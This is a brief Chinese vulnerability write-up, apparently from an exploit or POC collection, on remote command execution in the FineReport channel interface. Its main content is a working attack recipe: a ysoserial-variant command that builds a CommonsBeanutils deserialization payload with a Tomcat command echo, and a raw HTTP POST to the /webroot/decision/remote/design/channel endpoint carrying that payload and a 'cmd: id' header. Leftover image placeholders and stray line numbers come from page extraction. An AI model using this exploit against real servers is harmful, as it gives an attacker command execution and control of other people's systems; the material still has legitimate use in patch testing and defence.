# 帆软报表 channel 远程命令执行漏洞

# 漏洞描述

帆软报表 channel 接口存在远程命令执行漏洞, 攻击者通过漏洞可以获取服务器权限,攻击服务器

# 漏洞影响

帆软报表

# 网络测绘


# 漏洞复现

登陆页面

img

验证POC

java -jar ysuserial-1.5-su18-all.jar -g CommonsBeanutils1183NOCC -p 'EX-TomcatEcho' -ch "cmd" > fine10.bin

POST /webroot/decision/remote/design/channel HTTP/1.1
Content-Type: application/json
Host: 
cmd: id
Connection: close

{{gzip(file(fine10.bin))}}
1
2
3
4
5
6
7
8
9

img